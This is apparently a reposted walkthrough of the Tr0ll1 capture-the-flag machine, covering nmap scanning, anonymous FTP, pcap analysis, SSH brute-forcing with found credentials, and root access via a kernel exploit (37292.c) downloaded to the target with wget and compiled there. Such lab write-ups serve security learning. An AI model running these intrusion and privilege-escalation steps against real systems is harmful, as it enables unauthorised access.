009靶场-Tr0ll1
2026/7/28 2:42:01 网站建设 项目流程

信息收集及漏洞突破

端口扫描,发现开了三个端口:nmap 192.168.115.0/24 -p-

Nmap scan report for 192.168.115.148
Host is up (0.00031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

服务版本信息:nmap 192.168.115.148 -T4 -A -O

21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.115.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/secret

80端口下的网站以及目录扫描是一张图片,21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)提示我们ftp可以匿名登录,然后登录之后发现了一个流量包:

把lol.pcap放了wireshark里面进行流量分析,最后发现了这个sup3rs3cr3tdirlol,

根据提示信息,这一定是一个重要线索!

使用这个sup3rs3cr3tdirlol 进行ssh登录,ftp登录,都没成功,放了浏览器结果:

把good_luck/which_one_lol.txt的信息和/this_folder_contains_the_password/Pass.txt下的信息做为ssh 爆破的用户名和密码,最后发现用户名是overflow,密码居然是文件名Pass.txt(虽然有点狗,但是提供了一个思路)!

系统提权

使用ssh登录之后,信息收集:

首先想到的是内核提权,根据收集的信息kali里面搜索:searchsploit Ubuntu 14.04 Privilege Linux 3.13,根据收集的信息,逐步缩小搜索的范围,有利用做实验!

老方法,把.c文件下载下来,使用python下载到靶机,在靶机编译(前提条件是靶机支持下载以及gcc编译,这个简单测试即可)!

python -m http.server 80,wget http://192.168.115.130/37292.c,下载到tmp目录,否则提示权限不足;然后gcc编译,最后执行:

提权成功!!!

思路梳理

端口扫描发现21/22/80端口。扫描服务版本号,发现ftp可匿名登录。发现lol.pacp文件,里面发现一个提示的字符串,这个字符串到底是干啥的?最后测试放浏览器目录,发现一个文件,啥也没有,文件放linux执行,发现一个字符串,这个字符串又能干啥?最后又发现可以在目录访问,目录访问发现两个文件,里面有用户名和密码,最后用这里的用户名和密码爆破ssh成功。

提权使用内核提权!

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询